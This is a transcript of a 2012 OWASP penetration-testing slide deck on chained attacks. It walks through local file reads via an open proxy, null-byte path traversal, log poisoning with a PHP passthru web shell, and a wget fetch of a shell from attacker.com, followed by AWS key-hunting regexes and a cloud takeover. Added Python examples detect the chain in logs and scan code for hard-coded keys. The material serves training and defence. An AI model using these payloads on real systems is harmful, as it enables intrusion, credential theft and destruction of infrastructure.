Attack Chaining: Advanced Maneuvers for Hack Fu
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

Published in: Technology, Design
  1. Attack Chaining: Advanced Maneuvers for Hack Fu. OWASP ATL, 31 May 2012
  2. About Us: WHO ARE THESE DUDES? Rob, Sr. Security Associate @ Stach & Liu; Oscar, Security Associate @ Stach & Liu
  3. Penetration Test vs. Vulnerability Assessment
  4. vs.
  5. “Simulate a real world attack against a target network or application.” – EVERYBODY
  6. It answers the question, “could someone break in?”
  7. Penetration Testing: 1. Information Gathering; 2. Exploit & Penetrate; 3. Escalate Privileges; 4a. Maintain Access; 4b. Deny Access
  8. Pen Testing Scenario: web application penetration test; cloud-based infrastructure hosts multiple sites; out-sourced PHP development to many contractors; determine attacker's ability to compromise PII or infrastructure
  9. Step 1 – Explore
  10. Step 2 – Read Code: http://vuln.com/dir/share.js
      ... AJAX.Call({ method:'POST', url:'include/s_proxy.php' ...
  11. Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php?redirect_url=http://www.google.com
  12. Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/passwd
  13. Attack Chaining – Maneuver 1
  14. Attack Chaining – Maneuver 1
  15. Step 5 – Gather More Info: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/httpd.conf
  16. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
  17. Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
      <VirtualHost *>
        ServerName vuln.com
        DocumentRoot /var/www/sites/vuln.com/docroot
        ErrorLog logs/vuln.com_error_log
      </VirtualHost>
  18. Step 7 – Back to DirBuster
  19. Step 8 – Review Code: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
  20. Step 8 – Review Code: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
      <?php
      require_once('includes/config.php');
      $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
      $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
      $currentModuleFile = 'modules/' . $module . '/' . $action . '.php';
      include($currentModuleFile);
      exit;
      ?>
  21. Attack Chaining – Maneuver 2
  22. Attack Chaining – Maneuver 2
  23. Step 9 – Null Byte Injection: http://vuln.com/dir/include/controller.php?module=../../../../../../etc/passwd%00
  24. Step 8 – Review Code: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
      <?php
      require_once('includes/config.php');
      $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
      $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
      $currentModuleFile = 'modules/' . $module . '/' . $action . '.php';
      include($currentModuleFile);
      exit;
      ?>
  25. Step 10 – Review Gathered Info: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
  26. Step 10 – Back to Virtual Conf: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
      <VirtualHost *>
        ServerName vuln.com
        DocumentRoot /var/www/sites/vuln.com/docroot
        ErrorLog logs/vuln.com_error_log
      </VirtualHost>
  27. Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
      [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
  28. Step 12 – Poison Logs
  29. Step 12 – Poison Logs
  30. Step 12 – Poison Logs
      <? echo '<pre>'; passthru($_GET['cmd']); echo '</pre>'; ?>
  31. Step 13 – PHP in the Log: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
      [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
  32. Step 13 – PHP in the Log: http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
      [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
      [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo '<pre>'; passthru($_GET['cmd']); echo '</pre>'; ?>
  33. Step 14 – Execute Code: http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00cmd=ls;
      /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer:
      controller.php example.php includes modules phpinfo.php …
  34. Step 14 – Execute Code
      <? echo '<pre>'; passthru('ls'); echo '</pre>'; ?>
      /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer:
      controller.php example.php includes modules phpinfo.php …
  35. Attack Chaining – Maneuver 3
  36. Attack Chaining – Maneuver 3
  37. Step 15 – Upload Shell: http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00cmd=wget%20http://attacker.com/gny.php;
  38. Step 16 – Enjoy!
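The chain on slides 9 to 16 (open proxy read of file://, traversal plus null byte into include(), log poisoning, then cmd= execution) leaves a recognisable trail in the web server's access log. The detector below is an added example, not material from the deck: it parses constructed Apache combined-format lines, tags each request with the chain stage it matches, and only alerts on a client that hits two or more distinct stages, which is what separates a chained attack from scanner noise. The stage names and the sample log lines are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format access log (not a real capture). Client
# 10.10.65.18 walks the deck's chain; 192.0.2.7 is an ordinary user of the proxy.
SAMPLE_LOG = """\
10.10.65.18 - - [31/May/2012:10:01:02 -0400] "GET /dir/include/s_proxy.php?redirect_url=http://www.google.com HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.10.65.18 - - [31/May/2012:10:01:09 -0400] "GET /dir/include/s_proxy.php?redirect_url=file:///etc/passwd HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
10.10.65.18 - - [31/May/2012:10:02:30 -0400] "GET /dir/include/controller.php?module=../../../../../../etc/passwd%00 HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
10.10.65.18 - - [31/May/2012:10:03:11 -0400] "GET /wp-content/themes/lulzcat-attack.jpg HTTP/1.1" 404 212 "<?php echo 'x'; ?>" "Mozilla/5.0"
10.10.65.18 - - [31/May/2012:10:04:00 -0400] "GET /dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=ls HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
192.0.2.7 - - [31/May/2012:10:05:00 -0400] "GET /dir/include/s_proxy.php?redirect_url=http://www.example.com HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def classify(entry):
    """Map one parsed request to the chain stages it exhibits, in a fixed order."""
    params = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
    values = [v for vs in params.values() for v in vs]   # parse_qs already URL-decodes %00 etc.
    stages = []
    if any(v.lower().startswith("file:") for v in values):
        stages.append("proxy_local_file_read")          # s_proxy.php turned into a file:// reader
    if any("../" in v or "\x00" in v for v in values):
        stages.append("traversal_or_null_byte")         # module=../..%00 aimed at include()
        if "cmd" in params:
            stages.append("cmd_via_included_file")      # included log is expected to run $_GET['cmd']
    if "<?" in entry["referer"] or "<?" in entry["ua"]:
        stages.append("php_tag_in_client_header")       # log poisoning attempt
    return stages

def find_chains(log_text, min_stages=2):
    """Return {client_ip: [stages in first-seen order]} for clients that reached
    at least min_stages distinct stages; one stage is noise, a sequence is a chain."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        for stage in classify(entry):
            if stage not in seen[entry["ip"]]:
                seen[entry["ip"]].append(stage)
    return {ip: s for ip, s in seen.items() if len(s) >= min_stages}
```

Run over the sample, only 10.10.65.18 is reported, with the four stages in the order the deck walks them; the ordinary proxy user is not flagged.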
  39. Step 17 – I want more!
      ec2[^d][][A-Z0-9]{20}[]ec2.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]ec2.*[][A-Z0-9]{20}[]ec2(D)*[][A-Z0-9]{20}[]amazon.*[][A-Z0-9]{20}[](amazon|ec2).*[][A-Z0-9]{20}[]amazon(D)*[][A-Z0-9]{20}[]access secret [][A-Z0-9]{20}[] [A-Za-z0-9+/]{40}amazon.*[][A-Z0-9]{20}[].*[][A-Za-z0-9+/]{40}[]aws.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]amazon.*[][A-Z0-9]{20}[] [][A-Za-z0-9+/]{40}[]secret.*[][A-Za-z0-9+/]{40}[][][A-Za-z0-9+/]{40}[].*amazon
  40. Step 18 – Amazon AWS Regex
      $this->amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628',
      $aws_key = '8AFB5AF55D1E6620EE1';
      define('AMAZON_KEY', '372B8E408D1484C538F');
      if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884');
      //if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C');
      define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC');
  41. Step 19 – AWS Takeover
  42. Step 20 – Make It Your Own
  43. Cost of Amazon Cloud Compromise – CRITICAL EXPOSURE: 1. Found 8 Amazon Secret Keys to access Amazon S3; 2. Found that 2 of the 8 have administrator access to Amazon EC2; 3. Attacker launches 100 Extra Large Clusters: $1,049,000
  44. Take Them Off The Web – CRITICAL EXPOSURE: 1. Found 8 Amazon Secret Keys to access Amazon S3; 2. Found that 2 of the 8 have administrator access to Amazon EC2; 3. Attacker shuts down and deletes all servers and backups permanently: PRICELESS
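Slides 17 and 18 show that hard-coded AWS credentials are trivially greppable once source is readable, and slide 44 gives the remedy: get them off the web. The scanner below is an added example, not the deck's own tooling, for running the same kind of pattern match over your own repository before it ships: it uses the deck's shapes (a 20-character upper-case alphanumeric access key id, a 40-character base64 secret) but only reports a candidate when an AWS-related word appears on the same or a nearby line, which keeps build ids and hashes out of the results. The sample PHP source is constructed, and its two credentials are the public AWS documentation sample keys.

```python
import re

# Patterns adapted from the deck's "Step 17" list: an access key id is a run of
# 20 upper-case alphanumerics, a secret key a run of 40 base64 characters, and
# either is only interesting when an AWS-related word appears nearby.
ACCESS_KEY_RE = re.compile(r'(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])')
SECRET_KEY_RE = re.compile(r'(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40}(?![A-Za-z0-9+/])')
CONTEXT_RE = re.compile(r'aws|amazon|ec2|s3|access|secret', re.IGNORECASE)

# Constructed PHP source; the two credentials are the public AWS documentation
# sample keys, not live ones.
SAMPLE_SOURCE = """\
<?php
// Constructed example file; the credentials below are documentation samples.
require_once('includes/config.php');
$build_id = 'ABCDEF0123456789ABCD';   // 20 upper-case chars, but no cloud keyword nearby
define('DB_HOST', 'localhost');
$cache_ttl = 3600;
$this->amazonService = new Zend_Service_Amazon('AKIAIOSFODNN7EXAMPLE',
    'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY');
"""

def scan_for_keys(text, window=2):
    """Return (line_no, kind, value) for every candidate key whose own line, or a
    line within `window` lines of it, mentions an AWS-related keyword."""
    lines = text.splitlines()
    hits = []
    for i, line in enumerate(lines):
        context = " ".join(lines[max(0, i - window): i + window + 1])
        if not CONTEXT_RE.search(context):
            continue
        hits += [(i + 1, "access_key_id", m.group()) for m in ACCESS_KEY_RE.finditer(line)]
        hits += [(i + 1, "secret_access_key", m.group()) for m in SECRET_KEY_RE.finditer(line)]
    return hits

def redact(text, window=2):
    """Replace every flagged value so a file can be shared or committed safely."""
    for _, _, value in scan_for_keys(text, window):
        text = text.replace(value, "<REDACTED>")
    return text
```

Treat every hit as a rotation task, not just a redaction: a key that has ever been committed or served from a web root should be considered disclosed.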
  45. Attack Chaining – Hack Fu
  46. Attack Chaining – Hack Fu
  47. Why Is This Happening? 1. Local File Include (file read only; code execution); 2. Null Byte Injection; 3. Log Poisoning; 4. Insecure Credential Storage; 5. Overly Permissive Amazon AWS Keys; 6. Sensitive Information Disclosure
  48. Web → Mass Malware Deployment
  49. Web → Data Center Compromise
  50. Web → Internal Network Compromise
  51. Internal Assessment → SSN, Bank #’s
  52. Infrastructure Review
  53. Step 1 – Target Wireless
  54. Step 1 – Target Wireless
  55. Step 2 – Port Scan
  56. Step 3 – Test Default Creds
  57. Infrastructure Apocalypse
  58. Step 4 – Control AP
  59. Step 5 – Read All E-mail
  60. Step 6 – Listen To VOIP
  61. Step 7 – Open All Doors
  62. Step 7 – Open All Doors
  63.
  64. Step 7 – Server Room Door
  65. Is This Real Life? 1. Insecure Wireless Encryption; 2. Improper Network Segmentation; 3. Insecure Default Configuration; 4. Weak Passwords; 5. Sensitive Information Disclosure
  66. Protection – How? 1. People; 2. Policy; 3. Processes; 4. Strategic / Tactical Security; 5. Defense In-Depth
  67. Defense In-Depth: IS PROTECTION AGAINST...
  68. How Do You Get Better?
  69. Synthesis and Patterns: CAN BE BOTH GOOD AND BAD
  70. Attack Visualization: LIKE BOBBY FISCHER
  71. Thank You